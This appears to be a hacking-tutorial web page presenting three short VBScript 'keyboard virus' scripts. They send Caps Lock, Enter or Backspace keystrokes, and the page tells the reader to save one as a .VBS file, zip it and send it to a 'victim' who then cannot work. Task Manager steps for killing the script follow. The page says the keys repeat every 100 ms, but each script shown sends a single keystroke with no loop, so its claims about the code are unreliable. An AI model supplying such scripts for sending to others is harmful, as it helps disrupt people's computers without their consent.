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  • The below hacking code enables you to hack the keyboard. An automatic invocation of capslock is happened which will enable capslock key to on automatically on every 100 ms
    • Toggle keyboards - Caps Lock button simultaneously:

Keyboard Hacking - Virus 1:

Set wiki_Shell =wscript.CreateObject("WScript.Shell")
       wscript.sleep 100
       wiki_Shell.sendkeys "{CAPSLOCK}"
click below button to copy the code. By Ethical hacking tutorial team
  • Save it as "keyboard-virus.VBS" and send it as zip file

Learn ethical-hacking - ethical-hacking tutorial - keyboard-virus - ethical-hacking examples - ethical-hacking programs

  • On clicking the Script file, automatically the keyboard is hacked and caps lock button will get toggle continuously.

Output :


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Keyboard Hacking - Virus 2:

Set Key_hack = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
Key_hack.sendkeys "~(enter)"

click below button to copy the code. By Ethical hacking tutorial team

How virus works :

  • The above virus will enable your machine to automatically enter the “Enter” key so that, the victim can’t do any work until the virus is killed.

Keyboard Hack virus - Virus 3:

MsgBox "Let's go back a few steps"
Set oKeyHack =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
oKeyHack.sendkeys "{bs}"
click below button to copy the code. By Ethical hacking tutorial team

How virus works :

  • The above virus will enable your machine to automatically enter the “Back Space” key so that, the victim can’t do any work until the virus is killed.

How to kill virus :

  • Goto task bar and right click and select “Task Manager”

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  • Your task manager will open.
    • Search for “Microsoft Windows Based Script Host” in Windows10
    • Search for “wscript.exe” in Windows 7.

Learn ethical-hacking - ethical-hacking tutorial - virus-end-task - ethical-hacking examples - ethical-hacking programs

  • Select the process, right click and click “End Task”. Your process is killed and your virus is killed.

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